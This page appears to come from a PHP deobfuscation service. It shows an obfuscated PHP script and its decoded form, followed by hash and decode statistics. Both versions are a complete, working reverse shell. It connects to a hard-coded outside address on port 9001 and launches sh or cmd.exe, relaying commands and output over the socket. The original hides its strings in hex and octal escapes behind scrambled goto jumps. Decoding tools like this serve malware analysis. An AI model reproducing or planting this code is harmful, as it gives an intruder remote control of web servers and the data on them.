Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto A9Zsn; XgH6P: $sh = new Shell("\x31\x30\x38\56\x31\67\56\71\64\x2e\x32", 900..
Decoded Output download
<?php
goto A9Zsn;
XgH6P:
$sh = new Shell("108.17.94.2", 9001);
goto GyPJ5;
A9Zsn:
class Shell
{
private $addr = null;
private $port = null;
private $os = null;
private $shell = null;
private $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
private $buffer = 1024;
private $clen = 0;
private $error = false;
public function __construct($addr, $port)
{
$this->addr = $addr;
$this->port = $port;
}
private function detect()
{
$detected = true;
if (stripos(PHP_OS, "LINUX") !== false) {
$this->os = "LINUX";
$this->shell = "sh";
} else {
if (stripos(PHP_OS, "WIN32") !== false || stripos(PHP_OS, "WINNT") !== false || stripos(PHP_OS, "WINDOWS") !== false) {
$this->os = "WINDOWS";
$this->shell = "cmd.exe";
} else {
$detected = false;
}
}
return $detected;
}
private function daemonize()
{
$exit = false;
if ($pid > 0) {
$exit = true;
}
return $exit;
}
private function settings()
{
@error_reporting(0);
@set_time_limit(0);
@umask(0);
}
private function dump($data)
{
$data = str_replace("<", "<", $data);
$data = str_replace(">", ">", $data);
}
private function read($stream, $name, $buffer)
{
if (($data = @fread($stream, $buffer)) === false) {
$this->error = true;
}
return $data;
}
private function write($stream, $name, $data)
{
if (($bytes = @fwrite($stream, $data)) === false) {
$this->error = true;
}
return $bytes;
}
private function rw($input, $output, $iname, $oname)
{
while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
if ($this->os === "WINDOWS" && $oname === "STDIN") {
$this->clen += strlen($data);
}
$this->dump($data);
}
}
private function brw($input, $output, $iname, $oname)
{
$fstat = fstat($input);
$size = $fstat["size"];
if ($this->os === "WINDOWS" && $iname === "STDOUT" && $this->clen) {
while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {
$this->clen -= $bytes;
$size -= $bytes;
}
}
while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {
$size -= $bytes;
$this->dump($data);
}
}
public function run()
{
if ($this->detect() && !$this->daemonize()) {
$this->settings();
$socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
if ($socket) {
stream_set_blocking($socket, false);
$process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null);
if ($process) {
foreach ($pipes as $pipe) {
stream_set_blocking($pipe, false);
}
$status = proc_get_status($process);
@fwrite($socket, "SOCKET: Shell has connected! PID: " . $status["pid"] . "
");
do {
$status = proc_get_status($process);
if (feof($socket)) {
break;
} else {
if (feof($pipes[1]) || !$status["running"]) {
break;
}
}
$streams = array("read" => array($socket, $pipes[1], $pipes[2]), "write" => null, "except" => null);
$num_changed_streams = @stream_select($streams["read"], $streams["write"], $streams["except"], 0);
if ($num_changed_streams === false) {
break;
} else {
if ($num_changed_streams > 0) {
if ($this->os === "LINUX") {
if (in_array($socket, $streams["read"])) {
$this->rw($socket, $pipes[0], "SOCKET", "STDIN");
}
if (in_array($pipes[2], $streams["read"])) {
$this->rw($pipes[2], $socket, "STDERR", "SOCKET");
}
if (in_array($pipes[1], $streams["read"])) {
$this->rw($pipes[1], $socket, "STDOUT", "SOCKET");
}
} else {
if ($this->os === "WINDOWS") {
if (in_array($socket, $streams["read"])) {
$this->rw($socket, $pipes[0], "SOCKET", "STDIN");
}
if (($fstat = fstat($pipes[2])) && $fstat["size"]) {
$this->brw($pipes[2], $socket, "STDERR", "SOCKET");
}
if (($fstat = fstat($pipes[1])) && $fstat["size"]) {
$this->brw($pipes[1], $socket, "STDOUT", "SOCKET");
}
}
}
}
}
} while (!$this->error);
foreach ($pipes as $pipe) {
fclose($pipe);
}
proc_close($process);
}
fclose($socket);
}
}
}
}
goto XgH6P;
GyPJ5:
$sh->run();
goto ysT75;
ysT75:
unset($sh);
goto Mc7qU;
Mc7qU: ?>Did this file decode correctly?
Original Code
<?php
goto A9Zsn;
XgH6P:
$sh = new Shell("\x31\x30\x38\56\x31\67\56\71\64\x2e\x32", 9001);
goto GyPJ5;
A9Zsn:
class Shell
{
private $addr = null;
private $port = null;
private $os = null;
private $shell = null;
private $descriptorspec = array(0 => array("\x70\151\x70\x65", "\162"), 1 => array("\160\151\160\145", "\167"), 2 => array("\x70\151\x70\x65", "\x77"));
private $buffer = 1024;
private $clen = 0;
private $error = false;
public function __construct($addr, $port)
{
$this->addr = $addr;
$this->port = $port;
}
private function detect()
{
$detected = true;
if (stripos(PHP_OS, "\x4c\x49\x4e\125\130") !== false) {
$this->os = "\x4c\111\x4e\125\x58";
$this->shell = "\163\x68";
} else {
if (stripos(PHP_OS, "\127\111\116\63\62") !== false || stripos(PHP_OS, "\127\111\116\x4e\x54") !== false || stripos(PHP_OS, "\127\111\x4e\x44\117\x57\123") !== false) {
$this->os = "\x57\x49\116\x44\x4f\127\123";
$this->shell = "\143\155\x64\56\x65\x78\x65";
} else {
$detected = false;
}
}
return $detected;
}
private function daemonize()
{
$exit = false;
if ($pid > 0) {
$exit = true;
}
return $exit;
}
private function settings()
{
@error_reporting(0);
@set_time_limit(0);
@umask(0);
}
private function dump($data)
{
$data = str_replace("\x3c", "\46\154\164\x3b", $data);
$data = str_replace("\x3e", "\x26\x67\164\73", $data);
}
private function read($stream, $name, $buffer)
{
if (($data = @fread($stream, $buffer)) === false) {
$this->error = true;
}
return $data;
}
private function write($stream, $name, $data)
{
if (($bytes = @fwrite($stream, $data)) === false) {
$this->error = true;
}
return $bytes;
}
private function rw($input, $output, $iname, $oname)
{
while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
if ($this->os === "\x57\111\116\104\x4f\127\123" && $oname === "\123\x54\x44\x49\116") {
$this->clen += strlen($data);
}
$this->dump($data);
}
}
private function brw($input, $output, $iname, $oname)
{
$fstat = fstat($input);
$size = $fstat["\163\x69\x7a\145"];
if ($this->os === "\x57\x49\x4e\104\x4f\127\x53" && $iname === "\x53\124\x44\x4f\x55\124" && $this->clen) {
while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {
$this->clen -= $bytes;
$size -= $bytes;
}
}
while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {
$size -= $bytes;
$this->dump($data);
}
}
public function run()
{
if ($this->detect() && !$this->daemonize()) {
$this->settings();
$socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
if ($socket) {
stream_set_blocking($socket, false);
$process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null);
if ($process) {
foreach ($pipes as $pipe) {
stream_set_blocking($pipe, false);
}
$status = proc_get_status($process);
@fwrite($socket, "\x53\117\103\x4b\105\124\x3a\x20\x53\150\x65\154\154\40\150\141\x73\40\143\x6f\156\156\x65\143\x74\145\144\x21\x20\120\x49\104\72\x20" . $status["\x70\x69\144"] . "\12");
do {
$status = proc_get_status($process);
if (feof($socket)) {
break;
} else {
if (feof($pipes[1]) || !$status["\x72\165\x6e\x6e\151\156\147"]) {
break;
}
}
$streams = array("\162\x65\141\x64" => array($socket, $pipes[1], $pipes[2]), "\x77\162\x69\164\x65" => null, "\x65\x78\x63\145\160\x74" => null);
$num_changed_streams = @stream_select($streams["\x72\x65\x61\x64"], $streams["\167\162\x69\164\145"], $streams["\x65\x78\143\145\x70\x74"], 0);
if ($num_changed_streams === false) {
break;
} else {
if ($num_changed_streams > 0) {
if ($this->os === "\x4c\x49\116\x55\x58") {
if (in_array($socket, $streams["\x72\145\x61\x64"])) {
$this->rw($socket, $pipes[0], "\x53\x4f\103\113\105\124", "\x53\x54\104\111\x4e");
}
if (in_array($pipes[2], $streams["\162\145\141\144"])) {
$this->rw($pipes[2], $socket, "\123\x54\104\105\x52\x52", "\x53\x4f\x43\113\x45\124");
}
if (in_array($pipes[1], $streams["\x72\145\x61\x64"])) {
$this->rw($pipes[1], $socket, "\x53\124\x44\x4f\x55\x54", "\123\117\103\x4b\105\x54");
}
} else {
if ($this->os === "\127\x49\116\x44\x4f\x57\123") {
if (in_array($socket, $streams["\x72\x65\141\144"])) {
$this->rw($socket, $pipes[0], "\x53\x4f\x43\x4b\x45\x54", "\123\124\x44\x49\x4e");
}
if (($fstat = fstat($pipes[2])) && $fstat["\x73\x69\x7a\145"]) {
$this->brw($pipes[2], $socket, "\x53\x54\x44\105\122\122", "\x53\117\103\x4b\105\124");
}
if (($fstat = fstat($pipes[1])) && $fstat["\x73\x69\x7a\x65"]) {
$this->brw($pipes[1], $socket, "\123\x54\104\x4f\x55\x54", "\x53\117\x43\113\105\x54");
}
}
}
}
}
} while (!$this->error);
foreach ($pipes as $pipe) {
fclose($pipe);
}
proc_close($process);
}
fclose($socket);
}
}
}
}
goto XgH6P;
GyPJ5:
$sh->run();
goto ysT75;
ysT75:
unset($sh);
goto Mc7qU;
Mc7qU: ?>Function Calls
| None |
Stats
| MD5 | b3edc4e90e35b711030e0acfc9269449 |
| Eval Count | 0 |
| Decode Time | 53 ms |